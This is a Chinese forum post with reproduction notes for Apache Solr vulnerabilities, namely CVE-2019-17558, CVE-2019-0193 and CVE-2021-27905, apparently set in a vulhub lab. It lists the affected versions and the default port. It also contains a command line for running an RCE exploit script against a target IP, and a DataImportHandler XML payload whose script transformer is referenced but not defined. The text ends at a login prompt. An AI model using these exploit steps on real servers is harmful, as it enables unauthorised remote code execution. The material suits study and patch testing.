论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
安全
›
网络安全
›
Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份 ...
Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行 ...
拉不拉稀肚拉稀
金牌会员
|
2023-10-22 00:00:56
|
显示全部楼层
|
阅读模式
楼主
主题
845
|
帖子
845
|
积分
2537
Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行
solr 远程命令执行 (CVE-2019-17558)
漏洞简介
Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
影响范围
Apache Solr 5.0.0版本至8.3.1版本
默认端口
8983
漏洞复现
POC下载
solr_rce
python2 .\solr_rce.py 目标IP 命令
复制代码
solr 远程命令执行漏洞(CVE-2019-0193)
影响范围
Apache Solr < 8.2.0版本
利用条件
条件1:Apache Solr的DataImportHandler启用了模块DataImportHandler(默认不会被启用)
条件2:Solr Admin UI未开启鉴权认证。(默认情况无需任何认证)
漏洞复现
使用得vulhub得靶场,需要提前创建一个core才能进行复现
使用vulhub创建名为test得core
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db
复制代码
Solr Admin UI未开启鉴权认证就是可以直接访问如下界面,默认得配置就可以直接访问
选择已有核心后选择Dataimport功能并选择debug模式,更改填入以下POC,点击Execute with this Confuguration
POC:
<dataConfig>
<dataSource type="URLDataSource"/>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
复制代码
Solr 文件读取&SSRF (CVE-2021-27905)
漏洞简介
该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。
影响范围
Apache Solr
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
正序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
发新帖
回复
拉不拉稀肚拉稀
金牌会员
这个人很懒什么都没写!
楼主热帖
c语言学习4
【Atlas 800 训练服务器(型号:9000) ...
WinUI3 FFmpeg.autogen解析视频帧,使 ...
制造型企业的数字化转型离不开 MES 系 ...
IOS OpenGL ES GPUImage 黑白色调模糊 ...
SQLI-LABS(Less-11、12)
第四次打靶
1、etcd基础介绍
Docker 基础 - 3
MySQL的存储过程
标签云
挺好的
服务器
快速回复
返回顶部
返回列表